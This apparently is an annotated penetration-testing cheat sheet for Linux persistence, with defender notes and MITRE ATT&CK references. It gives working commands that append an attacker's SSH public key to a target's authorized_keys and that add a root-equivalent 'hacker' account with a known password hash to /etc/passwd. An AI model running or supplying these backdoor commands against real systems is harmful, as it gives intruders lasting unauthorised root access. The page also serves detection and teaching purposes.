Payload/Loot/Persistence

SSH Key Persistence

Prepare your public key
# Retrieve your public key from private key
# The inner `ssh-keygen -e` exports the key at ~/.ssh/id_rsa in RFC 4716 form
# and the outer `ssh-keygen -i` converts that back to the one-line OpenSSH
# form. The <(...) process substitution needs bash/zsh/ksh, not plain sh.
# `ssh-keygen -y -f ~/.ssh/id_rsa` prints the public key in a single step.
PUB=$(ssh-keygen -i -f <(ssh-keygen -e -f ~/.ssh/id_rsa))

# Generate command to type on target
# This only prints an append command for ~/.ssh/authorized_keys, with the key
# wrapped in single quotes; nothing is written locally.
# Defender note: an unexpected extra line in a user's authorized_keys is the
# artefact this technique leaves (MITRE ATT&CK T1098.004). File-integrity
# monitoring or an audit watch on authorized_keys files, plus periodic review
# of the keys they contain, surfaces it.
echo -e "echo '$PUB'>>~/.ssh/authorized_keys"
Create ~/.ssh/authorized_keys if it doesn’t exist on target
# Create the per-user SSH directory and key file with owner-only permissions
# (700 on the directory, 600 on the file).
# NOTE(review): sshd's StrictModes check is the usual reason these modes
# matter — confirm against the host's sshd_config.
# mkdir prints an error if ~/.ssh already exists; when pasted interactively
# the following commands still run.
# Defender note: a ~/.ssh directory or authorized_keys file appearing under an
# account that never used key logins (service accounts in particular) is worth
# alerting on.
mkdir ~/.ssh
chmod 700 ~/.ssh
touch ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

Add a user (UID 0 entry appended directly to /etc/passwd)

# Hash the password literal '1337' with SHA-512 crypt (-6), feeding it on
# stdin rather than as an openssl argument. openssl picks a random salt, so
# the output differs on every run; the line below is the page's sample output.
echo -n '1337'|openssl passwd -stdin -6
$6$07PkbbZSjiAeltsw$TXFcCHd1VvOg/xOjZHJP6XafpG4MzjKmGQ3smnnIUv7mIgAdlX1eqSuOnU6WbBo8bnM9sWfXvi5kzAMoeaFAy.

# Append a passwd entry named "hacker" with UID 0 and GID 0, home /root and
# shell /bin/bash, with the hash placed in the password field. The quoted
# 'EOF' delimiter stops the shell from expanding the $6$... text. /etc/passwd
# is normally writable only by root, so this presupposes root access.
# Defender note (MITRE ATT&CK T1136.001): two things stand out in this entry —
# a second UID-0 account, and a password hash stored in /etc/passwd itself
# instead of the usual "x" placeholder that points to /etc/shadow.
# `awk -F: '$3 == 0' /etc/passwd` lists UID-0 accounts; an audit watch or
# file-integrity check on /etc/passwd catches the write itself.
cat <<'EOF'>>/etc/passwd
hacker:$6$07PkbbZSjiAeltsw$TXFcCHd1VvOg/xOjZHJP6XafpG4MzjKmGQ3smnnIUv7mIgAdlX1eqSuOnU6WbBo8bnM9sWfXvi5kzAMoeaFAy.:0:0:Hacker Account:/root:/bin/bash
EOF

# Remove
# NOTE(review): the pattern below is unanchored, so it deletes every line that
# contains "hacker" anywhere (GECOS text, home path, ...). Anchoring it as
# '/^hacker:/d' limits the delete to that account's own entry.
# sed -i '/hacker/d' /etc/passwd